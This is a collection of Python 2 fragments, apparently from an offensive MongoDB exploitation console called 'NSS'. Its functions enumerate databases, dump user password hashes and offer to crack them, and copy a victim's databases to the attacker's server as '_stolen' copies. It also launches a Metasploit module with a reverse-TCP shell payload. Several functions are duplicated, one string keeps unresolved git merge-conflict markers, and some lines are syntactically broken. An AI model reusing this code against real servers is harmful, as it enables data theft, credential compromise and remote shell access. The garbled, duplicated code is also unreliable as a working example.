def setParam(self ,param ,value): '''set plugin par value''' param = param.upper() pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW) code = 'global %s\n'%param code += '%s="%s"'%(param ,value) exec(code)
def exploit(self): '''start exploit !!''' try: global exploitModule exploitModule = exploitModule() except: pass pp.prettyPrint("[*] Start exploit.." ,YELLOW) plugin.exploit()
def do_set(self,arg): args = arg.split(" ") if(len(args) == 2): param = args[0] value = args[1] if len(param) and len(value): res = self.pluginModule.checkParam(param) if res: self.pluginModule.setParam(param ,value) else: pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW) else: pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW)
def msfLaunch(self, RHOST, LHOST, LPORT): try: proc = "msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(RHOST) + " DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(LHOST) + " LPORT=" + str(LPORT) + " E", shell=True) except: pp.prettyPrint( "Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.", RED) return
def enumGrid (self,mongoConn): try: for dbItem in mongoConn.database_names(): try: db = mongoConn[dbItem] fs = gridfs.GridFS(db) files = fs.list() pp.prettyPrint("GridFS enabled on database " + str(dbItem),GREEN) pp.prettyPrint(" list of files:",GREEN) pp.prettyPrint("\n".join(files),PURPLE) except: pp.prettyPrint("GridFS not enabled on " + str(dbItem) + ".",RED) except: pp.prettyPrint("[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.",RED) return
def getPlatInfo(self, mongoConn): pp.prettyPrint("Mongodb Server Basic Info", GREEN) pp.prettyPrint( "MongoDB Version: " + mongoConn.server_info()['version'], PURPLE) pp.prettyPrint( "Debugs enabled : " + str(mongoConn.server_info()['debug']), PURPLE) pp.prettyPrint( "Platform: " + str(mongoConn.server_info()['bits']) + " bit", PURPLE) return
def enumGrid(self, mongoConn): try: for dbItem in mongoConn.database_names(): try: db = mongoConn[dbItem] fs = gridfs.GridFS(db) files = fs.list() pp.prettyPrint("GridFS enabled on database " + str(dbItem), GREEN) pp.prettyPrint(" list of files:", GREEN) pp.prettyPrint("\n".join(files), PURPLE) except: pp.prettyPrint( "GridFS not enabled on " + str(dbItem) + ".", RED) except: pp.prettyPrint( "[!]Error: Couldn't enumerate GridFS. The provided credentials may not have rights.", RED) return
def setParam(self ,param ,value): '''set plugin par value''' param = param.upper() if param == 'PAYLOAD': if value.upper() == "FALSE": code = 'global PAYLOAD;PAYLOAD="false";' exec(code) pp.prettyPrint("[*] Disabled PAYLOAD !" ,YELLOW) elif self.checkPayload(value) == 'TRUE' and self.getOption("PAYLOAD") != "FALSE": pp.prettyPrint("[*] SET PAYLOAD=>%s"%value ,YELLOW) code = 'global PAYLOAD\n' code += 'PAYLOAD="%s"'%value exec(code) else: pp.prettyPrint("[!] SET PAYLOAD FALSE !" ,RED) else: pp.prettyPrint("[*] SET %s=>%s"%(param ,value) ,YELLOW) code = 'global %s\n'%param code += '%s="%s"'%(param ,value) exec(code)
def errmsg(self,msg): '''show error msg''' pp.prettyPrint("[!] Err:%s"%msg,RED)
def mainExit(self): '''exit NSS''' pp.prettyPrint("\nBye ",RED) exit(0)
def printLogo(self): '''print NSS logo..''' pp.prettyPrint(self.logo,GREY,0)
def exeCMD(self,cmd): '''run system command''' pp.prettyPrint('[*] EXEC:%s'%cmd,RED) system(cmd)
def stealDBs(self,LHOST,LPORT,RHOST,mongoConn): victim = RHOST localDbIp = LHOST localDbPort = int(LPORT) dbList = mongoConn.database_names() menuItem = 1 if len(dbList) == 0: pp.prettyPrint("Can't get a list of databases to steal. The provided credentials may not have rights.",YELLOW) return for dbName in dbList: pp.prettyPrint(str(menuItem) + "-" + dbName,GREEN) menuItem += 1 try: dbLoot = raw_input("Select a database to steal:") except: pp.prettyPrint("[!]Invalid selection.",RED) stealDBs(myDB,mongoConn) try: #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance. dbNeedCreds = raw_input("Does this database require credentials (y/n)? ") if dbNeedCreds.lower() == "n": myDBConn = pymongo.MongoClient(localDbIp,localDbPort) myDBConn.copy_database(dbList[int(dbLoot)-1],dbList[int(dbLoot)-1] + "_stolen",victim) elif dbNeedCreds.lower() == "y": dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen",victim,dbUser,dbPass) else: pp.prettyPrint("[!]Invalid Selection. Press enter to continue.",RED) stealDBs(myDB,mongoConn) cloneAnother = raw_input("Database cloned. Copy another (y/n)? ") if cloneAnother.lower() == "y": self.stealDBs(myDB,mongoConn) else: return except: if str(sys.exc_info()).find('text search not enabled') != -1: pp.prettyPrint("Database copied, but text indexing was not enabled on the target. Indexes not moved.",GREEN) return else: pp.prettyPrint("[!]Something went wrong. Are you sure your MongoDB is running and options are set?",RED) return
def mainHelp(self): '''show help''' pp.prettyPrint('NSS HELP MENU',YELLOW) pp.prettyPrint('=============',GREY) pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW) pp.prettyPrint(' ------- -----------',GREY,0) pp.prettyPrint(''' help Displays the help menu exit Exit the NSS cls Clear the screen show List the plugins search Search plugins use Use the plugin''',CYAN) pp.prettyPrint('NSS HELP::SHOW',YELLOW) pp.prettyPrint('==============',GREY) pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW) pp.prettyPrint(' ------- -----------',GREY,0) pp.prettyPrint(''' mongodb List the mongodb plugins <<<<<<< HEAD ======= multi List the mongodb plugins >>>>>>> 6f81fb7bb1cc81ab5062065b198e4e0b4b97e162 all List all the plugins''',CYAN)
def showOptions(self): '''display plugin options''' pp.prettyPrint("\n",GREY) pp.prettyPrint(" PLUGIN OPTS" ,YELLOW) pp.prettyPrint(" ===========" ,GREY) pp.prettyPrint(" %-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW) pp.prettyPrint(" %-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY) for opt in plugin.opts: param = opt[0] value = opt[1] desc = opt[2] pp.prettyPrint(" %-15s"%param ,CYAN ,0) pp.prettyPrint("%-20s"%value, PURPLE, 0) pp.prettyPrint("%-20s"%desc , GREEN) pp.prettyPrint("\n",GREY)
def showUsage(tips): pp.prettyPrint('[?] USAGE:%s'%tips,YELLOW)
def showOptions(self): '''display plugin options''' pp.prettyPrint("PLUGIN OPTS" ,YELLOW) pp.prettyPrint("===========" ,GREY) pp.prettyPrint("%-15s %-20s %-40s"%("PARAMETER" ,"VALUE" ,"DESCRIPTION") ,YELLOW) pp.prettyPrint("%-15s %-20s %-40s"%("-"*15 ,"-"*20 ,"-"*40) ,GREY) for opt in plugin.opts: param = opt[0] value = opt[1] desc = opt[2] pp.prettyPrint("%-15s"%param ,CYAN ,0) exec('pp.prettyPrint("%-20s"%' + "%s"%param + ', PURPLE, 0)') pp.prettyPrint("%-40s"%desc ,GREEN) if self.checkPayload(PAYLOAD) == "TRUE": pp.prettyPrint("PAYLOAD OPTS" ,YELLOW) pp.prettyPrint("============" ,GREY) pp.prettyPrint("%-15s %-40s"%("PARAMETER" ,"DESCRIPTION") ,YELLOW) pp.prettyPrint("%-15s %-40s"%("-"*15 ,"-"*40) ,GREY) code = open("plugins/payload/" + PAYLOAD + ".py").read() exec(code) try: exec("global NSSPayload") except: pass for opt in NSSPayload.opts: param = opt[0] desc = opt[1] pp.prettyPrint("%-15s"%param ,CYAN ,0) pp.prettyPrint("%-40s"%desc ,PURPLE)
def enumDbs(self, mongoConn): try: pp.prettyPrint("List of databases:", GREEN) pp.prettyPrint("\n".join(mongoConn.database_names()), PURPLE) except: pp.prettyPrint( "[!]Error: Couldn't list databases. The provided credentials may not have rights.", RED) pp.prettyPrint("List of collections:", GREEN) try: for dbItem in mongoConn.database_names(): db = mongoConn[dbItem] pp.prettyPrint(dbItem + ":", CYAN) pp.prettyPrint("\n".join(db.collection_names()), PURPLE) if 'system.users' in db.collection_names(): users = list(db.system.users.find()) pp.prettyPrint("Database Users and Password Hashes:", GREEN) for x in range(0, len(users)): pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'], GREEN) pp.prettyPrint("\n", GREEN) crack = raw_input("Crack this hash (y/n)? ") if crack.lower() == "y": self.passCrack(users[x]['user'], users[x]['pwd']) except: pp.prettyPrint( "[!]Error: Couldn't list collections. The provided credentials may not have rights.", RED) return
def info(self): '''display plugin infos''' pp.prettyPrint("PLUGIN INFOS" ,YELLOW) pp.prettyPrint("============" ,GREY) pp.prettyPrint("PARAMETER VALUE" ,YELLOW) pp.prettyPrint("-"*15 + " " + "-"*20 ,GREY) for info in plugin.infos: param = info[0] value = info[1] pp.prettyPrint("%-15s"%param ,CYAN ,0) pp.prettyPrint("%-s"%value ,PURPLE)
def pluginHelp(self): '''plugin help menu''' pp.prettyPrint('PLUGIN HELP MENU' ,YELLOW) pp.prettyPrint('================' ,GREY) pp.prettyPrint(' Command Description' ,YELLOW) pp.prettyPrint(' ------- -----------' ,GREY ,0) pp.prettyPrint(''' help Displays the plugin menu exit Back to NSS Main cls Clear the screen info Displays the plugin info show Displays the plugin options set Configure the plugin parameters exploit Start plugin to exploit''' ,CYAN) pp.prettyPrint('PLUGIN SET HELP' ,YELLOW) pp.prettyPrint('===============' ,GREY) pp.prettyPrint(' Command Description' ,YELLOW) pp.prettyPrint(' ------- -----------' ,GREY,0) pp.prettyPrint(''' PAYLOAD Set payload <PARAMETER> Set parameter''' ,CYAN)
def loadError(self,flag): if flag: pp.prettyPrint("[!] NO THIS PLUGIN !",RED) else: pp.prettyPrint("[!] IT'S A PAYLOAD !",RED)
def start(self): pp.prettyPrint("[*] Start NSS ..",GREEN)
def stealDBs(self, LHOST, LPORT, RHOST, mongoConn): victim = RHOST localDbIp = LHOST localDbPort = int(LPORT) dbList = mongoConn.database_names() menuItem = 1 if len(dbList) == 0: pp.prettyPrint( "Can't get a list of databases to steal. The provided credentials may not have rights.", YELLOW) return for dbName in dbList: pp.prettyPrint(str(menuItem) + "-" + dbName, GREEN) menuItem += 1 try: dbLoot = raw_input("Select a database to steal:") except: pp.prettyPrint("[!]Invalid selection.", RED) stealDBs(myDB, mongoConn) try: #Mongo can only pull, not push, connect to my instance and pull from verified open remote instance. dbNeedCreds = raw_input( "Does this database require credentials (y/n)? ") if dbNeedCreds.lower() == "n": myDBConn = pymongo.MongoClient(localDbIp, localDbPort) myDBConn.copy_database(dbList[int(dbLoot) - 1], dbList[int(dbLoot) - 1] + "_stolen", victim) elif dbNeedCreds.lower() == "y": dbUser = raw_input("Enter database username: "******"Enter database password: "******"_stolen", victim, dbUser, dbPass) else: pp.prettyPrint( "[!]Invalid Selection. Press enter to continue.", RED) stealDBs(myDB, mongoConn) cloneAnother = raw_input("Database cloned. Copy another (y/n)? ") if cloneAnother.lower() == "y": self.stealDBs(myDB, mongoConn) else: return except: if str(sys.exc_info()).find('text search not enabled') != -1: pp.prettyPrint( "Database copied, but text indexing was not enabled on the target. Indexes not moved.", GREEN) return else: pp.prettyPrint( "[!]Something went wrong. Are you sure your MongoDB is running and options are set?", RED) return
def mainHelp(self): '''show help''' pp.prettyPrint("\n",GREY) pp.prettyPrint(' NSS HELP MENU',YELLOW) pp.prettyPrint(' =============',GREY) pp.prettyPrint(' COMMAND DESCRIPTION',YELLOW) pp.prettyPrint(' ------- -----------',GREY,0) pp.prettyPrint(''' help Displays the help menu show List the plugins search Search plugins use Use the plugin banner Show the banner cls Clear the screen exit Exit the NSS''',CYAN) pp.prettyPrint("\n",GREY)
def enumDbs (self,mongoConn): try: pp.prettyPrint("List of databases:",GREEN) pp.prettyPrint("\n".join(mongoConn.database_names()),PURPLE) except: pp.prettyPrint("[!]Error: Couldn't list databases. The provided credentials may not have rights.",RED) pp.prettyPrint("List of collections:",GREEN) try: for dbItem in mongoConn.database_names(): db = mongoConn[dbItem] pp.prettyPrint(dbItem + ":",CYAN) pp.prettyPrint("\n".join(db.collection_names()),PURPLE) if 'system.users' in db.collection_names(): users = list(db.system.users.find()) pp.prettyPrint("Database Users and Password Hashes:",GREEN) for x in range (0,len(users)): pp.prettyPrint("Username: "******"Hash: " + users[x]['pwd'],GREEN) pp.prettyPrint("\n",GREEN) crack = raw_input("Crack this hash (y/n)? ") if crack.lower() == "y": self.passCrack(users[x]['user'],users[x]['pwd']) except: pp.prettyPrint("[!]Error: Couldn't list collections. The provided credentials may not have rights.",RED) return
def loadError(self): pp.prettyPrint("[!] NO THIS PLUGIN !",RED)
def msfLaunch(self,RHOST,LHOST,LPORT): try: proc ="msfcli exploit/linux/misc/mongod_native_helper RHOST=" + str(RHOST) +" DB=local PAYLOAD=linux/x86/shell/reverse_tcp LHOST=" + str(LHOST) + " LPORT="+ str(LPORT) + " E", shell=True) except: pp.prettyPrint("Something went wrong. Make sure Metasploit is installed and path is set, and all options are defined.",RED) return
def pluginHelp(self): '''plugin help menu''' pp.prettyPrint("\n",GREY) pp.prettyPrint(' PLUGIN HELP MENU' ,YELLOW) pp.prettyPrint(' ================' ,GREY) pp.prettyPrint(' Command Description' ,YELLOW) pp.prettyPrint(' ------- -----------' ,GREY ,0) pp.prettyPrint(''' help Displays the plugin menu info Displays the plugin info show Displays the plugin options set Configure the plugin parameters exploit Exploit the target cls Clear the screen back Back to NSS Main''' ,CYAN) pp.prettyPrint(' PLUGIN SET HELP' ,YELLOW) pp.prettyPrint(' ===============' ,GREY) pp.prettyPrint(' Command Description' ,YELLOW) pp.prettyPrint(' ------- -----------' ,GREY,0) pp.prettyPrint(''' <PARAMETER> Set parameter''' ,CYAN) pp.prettyPrint("\n",GREY)
def getPlatInfo(self,mongoConn): pp.prettyPrint("Mongodb Server Basic Info",GREEN) pp.prettyPrint("MongoDB Version: " + mongoConn.server_info()['version'],PURPLE) pp.prettyPrint("Debugs enabled : " + str(mongoConn.server_info()['debug']),PURPLE) pp.prettyPrint("Platform: " + str(mongoConn.server_info()['bits']) + " bit",PURPLE) return
if len(param) and len(value): res = self.pluginModule.checkParam(param) if res: self.pluginModule.setParam(param ,value) else: pp.prettyPrint("[!] ERR:invalid set param" ,YELLOW) else: pp.prettyPrint("[?] USAGE:set <PARAM> <VALUE>" ,YELLOW) def complete_set(self,text,line,begidx,endidx): USE_ARG = self.pluginModule.getOptions() if not text: completions = USE_ARG[:] else: completions = [i for i in USE_ARG if i.startswith(text.upper())] return completions def do_EOF(self): return True do_back = do_exit if __name__ == '__main__': try: loads = loadPlugin(arg) loads.cmdloop() except KeyboardInterrupt: pp.prettyPrint("\n[!] CTRL+C EXIT !",RED) except Exception,e: pp.prettyPrint("[!] ERR:%s"%e,RED)
def info(self): '''display plugin infos''' pp.prettyPrint("\n",GREY) pp.prettyPrint(" PLUGIN INFOS" ,YELLOW) pp.prettyPrint(" ============" ,GREY) pp.prettyPrint(" PARAMETER VALUE" ,YELLOW) pp.prettyPrint(" "+"-"*15 + " " + "-"*20 ,GREY) for info in plugin.infos: param = info[0] value = info[1] pp.prettyPrint(" %-15s"%param ,CYAN ,0) pp.prettyPrint("%-s"%value ,PURPLE) pp.prettyPrint("\n",GREY)